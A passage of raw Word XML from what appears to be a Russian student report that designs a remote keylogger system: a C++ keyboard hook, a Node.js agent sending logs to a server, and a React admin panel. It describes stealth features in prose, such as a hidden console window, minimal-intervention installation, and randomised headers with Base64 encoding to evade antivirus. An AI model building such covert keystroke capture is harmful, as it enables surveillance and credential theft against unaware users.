        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">предусмотрена реализация базовых </w:t>
      </w:r>
      <w:r w:rsidRPr="002F2FDC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>операций управления: запрос обновлённой информации от устройства, обновление или пересоздание списка логов, удаление конкретного лога. Кроме того, интерфейс должен отображать структуру и статус всех подключённых устройств, чтобы администратор мог отслеживать их активность и своевременно обнаруживать неполадки или отключения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B047CD" w14:textId="3A790E2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Интерфейс должен быть кроссбраузерным и адаптированным под все современные устройства, включая ПК, планшеты и смартфоны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208344BE" w14:textId="4D3079C8" w:rsidR="002F2FDC" w:rsidRPr="002F2FDC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Кроме того, программное средство должно обладать высокой степенью расширяемости: архитектура приложения должна позволять легко добавлять новые модули и функции, такие как поддержка различных типов агентов (например, скриншотеров или мониторинга сети), а также внедрение баз данных на следующем этапе развития проекта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C087FA9" w14:textId="66F0EEBC" w:rsidR="00C77134" w:rsidRPr="00CB6E62" w:rsidRDefault="002F2FDC" w:rsidP="002F2FDC">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2FDC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таким образом, разрабатываемая система представляет собой многоуровневое распределённое решение, ориентированное на безопасный сбор, централизованное хранение и удобный анализ пользовательской активности в рамках удалённого мониторинга.</w:t>
      </w:r>
      <w:r w:rsidR="00D3365C" w:rsidRPr="00CB6E62">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1660A4" w14:textId="77777777" w:rsidR="00A7194F" w:rsidRPr="00EF05B5" w:rsidRDefault="00EF05B5" w:rsidP="004405D2"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rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF05B5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF05B5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/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АНАЛИЗ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К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ПРОГРАММНОМ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СРЕДСТВУ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И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РАЗРАБОТКА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ФУНКЦИОНАЛЬНЫХ</w:t>
      </w:r>
      <w:r w:rsidR="004405D2" w:rsidRPr="004405D2"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 w:rsidR="004405D2" w:rsidRPr="004405D2">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ТРЕБОВАНИЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E867188" w14:textId="77777777" w:rsidR="0085655A" w:rsidRDefault="0085655A" w:rsidP="00833069">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D583606" w14:textId="77777777" w:rsidR="003B705F" w:rsidRPr="003B705F" w:rsidRDefault="003B705F" w:rsidP="003B705F">
      <w:pPr>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="320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3B705F">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исходя из поставленной задачи и сформулированных требований, разрабатываемое программное средство должно обеспечивать выполнение следующих функций:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEBC923" w14:textId="0E58B6F3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существлять установку и запуск клиентского агента (кейлоггера) на целевом устройстве с минимальным вмешательством пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C69C0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изводить непрерывный сбор данных о вводе с клавиатуры, включая символы, время и дату нажатий, а также имя и идентификатор активного окна, в котором происходил ввод;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654AE65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зафиксированные данные в локальных текстовых файлах на клиентском устройстве в структурированном виде;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60353D36" w14:textId="7C6F4018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выполнять передачу логов на серверную часть по заданному расписанию (например, каждые N минут);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B6068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вать возможность серверной части запрашивать у кейлоггера актуальные данные в реальном времени без ожидания плановой отправки;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD8A34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сохранять полученные от клиентов данные на сервере в виде иерархической файловой структуры, где каждой машине соответствует отдельный файл или каталог;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00781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едоставлять REST API-интерфейс для обработки входящих запросов от клиента, а также для взаимодействия с фронтенд-интерфейсом;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E078AD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реализовать защищённый и адаптивный веб-интерфейс для администратора системы, позволяющий:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26583B90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просматривать структуру всех подключённых устройств;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E37CAB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анализировать логи за выбранный период;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152A35F4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инициировать отправку новых данных с устройства;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D47939" w14:textId="7AAB45CB" w:rsidR="003B705F" w:rsidRPr="003B705F" w:rsidRDefault="00E85B91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>у</w:t>
      </w:r>
      <w:r w:rsidR="003B705F" w:rsidRPr="003B705F">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>далять отдельные логи;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF0473" w14:textId="77777777" w:rsidR="003B705F" w:rsidRPr="003B705F" w:rsidRDefault="003B705F" w:rsidP="00E85B91">
      <w:pPr>
        <w:pStyle w:val="af1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тслеживать статус подключения клиентов и общее состояние системы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4432C496" w14:textId="77777777" w:rsidR="003B705F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NewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28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кроссбраузерную совместимость веб-интерфейса, а также его корректную работу на ПК, планшетах и мобильных устройствах;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083AC6AA" w14:textId="6291507D" w:rsidR="002D50E7" w:rsidRPr="003B705F" w:rsidRDefault="003B705F" w:rsidP="003B705F">
      <w:pPr>
        <w:pStyle w:val="af1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34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B705F">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Regular" w:hAnsi="TimesNewRomanPSMT-Regular"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обеспечить возможность расширения системы в будущем — за счёт внедрения дополнительных клиентских модулей, а также подключения СУБД для хранения и анализа данных.</w:t>
      </w:r>
      <w:r w:rsidR="002D50E7" w:rsidRPr="003B705F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E421FA" w14:textId="77777777" w:rsidR="00E814BE" w:rsidRDefault="00E814BE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  <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/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ЕКТИРОВАНИЕ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ПРОГРАММНОГО</w:t>
      </w:r>
      <w:r w:rsidR="00487F6E" w:rsidRPr="00487F6E"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 w:rsidR="00487F6E" w:rsidRPr="00487F6E">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT-Bold" w:hAnsi="TimesNewRomanPSMT-Bold" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>СРЕДСТВА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F852D5" w14:textId="77777777" w:rsidR="00E814BE" w:rsidRPr="00880BD1" w:rsidRDefault="00E814BE" w:rsidP="000B75DC">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F033B98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Проектирование программного средства начинается с определения его общей архитектуры, исходя из требований надёжности, расширяемости, удобства сопровождения и обеспечения кроссплатформенности. Разрабатываемое программное средство предназначено для удалённого контроля пользовательских действий и должно включать в себя как средства сбора информации, так и средства её отображения и администрирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DBB4B5" w14:textId="21495D6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истема условно разделена на две основные части: клиентскую</w:t>
      </w:r>
      <w:r w:rsidR="00C2430F">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F66EB4">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(кейлоггер и интерфейс)</w:t>
      </w:r>
      <w:r w:rsidRPr="00492C74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и серверную. Такая архитектура обеспечивает модульность, что позволяет независимо обновлять или масштабировать компоненты, не затрагивая всю систему в целом. Это решение также повышает надёжность и гибкость при внедрении изменений и новых функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62427389" w14:textId="1770C7F3" w:rsid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Серверная часть отвечает за хранение, обработку и предоставление данных, поступающих от агентов, установленных на пользовательских устройствах. Также сервер обрабатывает запросы от клиентского интерфейса и реализует логику взаимодействия с файловой системой, включая работу с логами. Для реализации серверной логики применяется REST-подход, при котором каждая операция доступна через отдельный HTTP-метод (GET, POST, DELETE). Такой подход обеспечивает простоту и универсальность взаимодействия между компонентами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B8266E" w14:textId="51F764BD" w:rsidR="001B5174" w:rsidRPr="00492C74" w:rsidRDefault="001B5174" w:rsidP="001B51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Также с</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6DBF">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ерверная часть развёрнута на устройстве с постоянным (статическим) IP-адресом. Для обеспечения доступа к серверу из внешней сети настроен проброс портов через маршрутизатор. Это позволяет агенту (кейлоггеру) и административной панели взаимодействовать с сервером, независимо от их физического местоположения, что критически важно для системы удалённого контроля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C9613" w14:textId="6FABD7AE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Клиентская часть, выполняющая роль административной панели, реализуется в виде одностраничного веб-приложения (SPA). Выбор такого подхода обусловлен необходимостью быстрой и динамичной работы интерфейса, особенно при регулярной загрузке новых данных. Благодаря использованию технологий AJAX, клиент может асинхронно обмениваться данными с сервером без перезагрузки страницы, что повышает скорость работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77053D7C" w14:textId="77777777" w:rsidR="00492C74" w:rsidRPr="00492C74" w:rsidRDefault="00492C74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Обмен данными между клиентом и сервером осуществляется в формате JSON, поскольку этот формат легко интегрируется в веб-технологии, экономит трафик и обладает хорошей читаемостью. В отличие от XML, JSON содержит меньше избыточной информации и обрабатывается быстрее, что особенно важно при регулярной передаче больших объёмов логов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A57110" w14:textId="58994334" w:rsidR="00492C74" w:rsidRPr="00AE53AE" w:rsidRDefault="00492C74" w:rsidP="00AE53AE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</w:pPr>
      <w:r w:rsidRPr="00492C74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Архитектура программного средства также предполагает наличие внутреннего агента (кейлоггера), который работает на пользовательском устройстве и передаёт информацию на сервер. В рамках проектирования определены форматы логов, механизмы их хранения и расписание передачи </w:t>
      </w:r>
      <w:r w:rsidRPr="00492C74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">данных, включая возможность принудительной отправки через систему </w:t>
      </w:r>
      <w:r w:rsidR="009D5C5D" w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>long-polling</w:t>
      </w:r>
      <w:r w:rsidRPr="00492C74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EE6DBF" w:rsidRPr="00EE6DBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE6DBF" w:rsidRPr="00EE6DBF">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Для повышения устойчивости к обнаружению со стороны антивирусного ПО кейлоггер перед отправкой данных случайным образом подбирает HTTP-заголовки, имитируя обычную сетевую активность, а также применяет кодирование содержимого логов в формате Base64. Это позволяет маскировать передаваемую информацию под легитимный трафик и минимизирует риск блокировки со стороны систем защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18487B94" w14:textId="63723FB7" w:rsidR="000B2A95" w:rsidRDefault="000B2A95" w:rsidP="00492C7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0B2A95">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Сам агент кейлоггера разделён на два логически независимых компонента: модуль регистрации нажатий клавиш и модуль взаимодействия с сервером. Первый компонент занимается непосредственным отслеживанием пользовательской активности и сохранением информации в локальный файл. Второй компонент, выступающий в роли клиента, отслеживает состояние этого файла, осуществляет чтение накопленных данных и их отправку на сервер. Такое разделение позволяет изолировать процесс логирования от сетевого взаимодействия, повышая надёжность и устойчивость системы к сбоям в соединении, а также упрощает последующую модификацию и сопровождение отдельных компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8523C3" w14:textId="0F71F91E" w:rsidR="005B5C1B" w:rsidRDefault="00492C74" w:rsidP="00EE6DBF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 w:rsidRPr="00492C74">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>В итоге, архитектура программного средства представляет собой распределённую систему, в которой каждый компонент выполняет строго определённую роль. Это упрощает поддержку, тестирование и модификацию системы в дальнейшем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC34BEB" w14:textId="77777777" w:rsidR="00EB3284" w:rsidRDefault="005C4D37" w:rsidP="0023117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b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="001B52E2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="001B52E2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0023117C" w:rsidRPr="0023117C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>КОНСТРУИРОВАНИЕ ПРОГРАММНОГО СРЕДСТВА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124451A3" w14:textId="77777777" w:rsidR="0023117C" w:rsidRDefault="0023117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6C8537E6" w14:textId="559078F4" w:rsidR="00F66EB4" w:rsidRDefault="00F66EB4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F66EB4">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Вся система распределённого удалённого управления логически разделена на три основны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66EB4">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> компонента: клиентский кейлоггер, серверную часть и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">клиентский </w:t>
      </w:r>
      <w:r w:rsidRPr="00F66EB4">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>веб-интерфейс администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A7D7F" w14:textId="68F07A00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>В качестве языка программирования серверной части был выбран JavaScript, с использованием среды выполнения Node.js, что обеспечило кроссплатформенность, простоту асинхронной обработки запросов и широкую экосистему библиотек. В качестве основного фреймворка для разработки был использован Express.js — лёгкий и гибкий фреймворк, позволяющий быстро создавать REST-интерфейсы, настраивать маршрутизацию, обрабатывать HTTP-заголовки и запросы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229F548" w14:textId="147D2A11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 xml:space="preserve">Дополнительно на серверной стороне реализован механизм long-polling, позволяющий поддерживать постоянную связь между сервером и клиентскими агентами без необходимости частых опросов. Это особенно важно в условиях ограничений, при которых невозможно использовать WebSocket-соединения. Long-polling был реализован на основе событийной модели: сервер хранит очередь ожидания для каждого клиента и уведомляет его о доступных командах или событиях, как только они становятся доступны. Такой подход обеспечивает немедленную реакцию клиентской части на действия с сервера при минимальных задержках и ресурсоёмкости. </w:t>
      </w:r>
      <w:r w:rsidR="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Таким образом сервер может досрочно запрашивать новые данные от клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB3C6DD" w14:textId="427E8DE9" w:rsidR="009429E8" w:rsidRPr="009429E8" w:rsidRDefault="009429E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429E8">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Хранение данных на сервере осуществляется в файловом виде, что позволило упростить инфраструктуру и сделать систему независимой от дополнительных СУБД. Для организации файловой структуры и чтения/записи данных были использованы стандартные модули Node.js: fs, path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E0E1ED" w14:textId="145E1E31" w:rsid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Таким образом, серверная часть получилась модульной, расширяемой и достаточно производительной для целей распределённого удалённого управления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8F4F2" w14:textId="77777777" w:rsidR="002B625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47A1ADB" w14:textId="7381831B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Клиентская часть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2A95">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>агент кейлоггера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>реализована в виде двух компонентов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB07711" w14:textId="0F0CEBB5" w:rsidR="002B6258" w:rsidRPr="002B6258" w:rsidRDefault="009D5C5D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t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6DBF">
        <w:t>ейлоггер</w:t>
      </w:r>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B6258" w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>на C++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D81E19" w14:textId="77777777" w:rsidR="002B6258" w:rsidRPr="002B6258" w:rsidRDefault="002B6258" w:rsidP="002B6258">
      <w:pPr>
        <w:pStyle w:val="af1"/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2B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Агент передачи данных и команд на Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66503272" w14:textId="6121C550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1. Компонент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="009D5C5D" w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>на C++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC33C7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Программа на C++ устанавливает низкоуровневый перехват клавиатурных событий с использованием системной функции SetWindowsHookEx с параметром WH_KEYBOARD_LL. Это позволяет регистрировать все нажатия клавиш в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76CB34" w14:textId="6AB8D135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Обработка событий реализована в функции HookCallback. При каждом нажатии клавиши извлекается её код (vkCode), который записывается в локальный файл. Для обеспечения корректной кодировки используется </w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BOM-метка UTF-8. Запись производится в бинарном режиме с флагом ios_base::app, что предотвращает перезапись существующих данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307E464" w14:textId="4591443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Для обеспечения скрытности работы </w:t>
      </w:r>
      <w:r w:rsidR="009D5C5D" w:rsidRPr="00EE6DBF">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>кейлоггер</w:t>
      </w:r>
      <w:r w:rsidR="009D5C5D">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>, окно консоли скрывается с помощью ShowWindow, а сама программа работает в фоновом режиме, не создавая видимых окон или диалогов. После установки хука программа переходит в цикл обработки сообщений, поддерживая активную работу перехватчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D0646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2. Node.js-агент</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A066D85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Дополнительный агент, написанный на JavaScript с использованием Node.js, выполняет функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA101B6" w14:textId="52EF3E25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</w:t>
      </w:r>
      <w:r w:rsidR="002B6258" w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>бор и отправка данных на сервер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B2F0E" w14:textId="2FCBD384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>олучение управляющих команд с сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E52B19" w14:textId="38E451A6" w:rsidR="002B6258" w:rsidRPr="002B6258" w:rsidRDefault="00F66EB4" w:rsidP="002B6258">
      <w:pPr>
        <w:pStyle w:val="af1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</w:t>
      </w:r>
      <w:r w:rsidR="002B6258" w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>оддержка механизма long-polling на основе событий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1A8CD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Отправка данных (POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19457CF1" w14:textId="4A8F8963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С определённым интервалом (каждые 5 минут) агент выполняет проверку содержимого файла. Если файл содержит данные, они считываются, кодируются в Base64 и отправляются на сервер с помощью HTTP POST-запроса. После успешной отправки файл очищается для предотвращения дублирования. При отправке устанавливаются случайные заголовки User-Agent и Referer, имитируя поведение обычного браузера, что затрудняет выявление подозрительного трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645A08B" w14:textId="77777777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Получение команд (GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182CEFAE" w14:textId="673918E6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Одновременно с отправкой данных запускается механизм long-polling</w:t>
      </w:r>
      <w:r w:rsidR="00991484">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>, то есть</w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> клиент инициирует длительный GET-запрос, передавая в параметрах свой идентификатор (имя пользователя в системе). Сервер, в случае наличия команд, немедленно возвращает ответ, который может, например, инициировать внеплановую отправку данных (action: "sendData"). После получения команды клиент сразу же инициирует следующий long-polling-запрос, обеспечивая непрерывную обратную связь.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E81DBE" w14:textId="2276EFEA" w:rsidR="002B6258" w:rsidRP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>В случае ошибки или прерывания связи, клиент автоматически инициирует повторный запрос через короткую паузу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC6390" w14:textId="4000ED0A" w:rsidR="002B6258" w:rsidRDefault="002B6258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2B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Такая архитектура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">клиента </w:t>
      </w:r>
      <w:r w:rsidRPr="002B6258">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>обеспечивает гибкость, надёжность связи и скрытность функционирования клиента в рамках распределённой системы удалённого управления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E927D7C" w14:textId="54E4EA9E" w:rsidR="00991484" w:rsidRDefault="00991484" w:rsidP="002B625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1FD617F2" w14:textId="227D062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Клиентская административная панель реализована на языке JavaScript с использованием библиотеки React.js — современного инструмента для построения одностраничных приложений. Интерфейс предоставляет централизованный доступ к логам клиентов и управление ими в реальном времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF88CF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Архитектура приложения построена по компонентному принципу, обеспечивающему изоляцию логики, переиспользуемость элементов и удобство масштабирования. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926A68A" w14:textId="222B212C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lastRenderedPageBreak/>
        <w:t>Основные компоненты включают:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F22DF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>MainPanel — центральный контейнер приложения, отвечающий за организацию общего макета и логику отображения данных;</w:t>
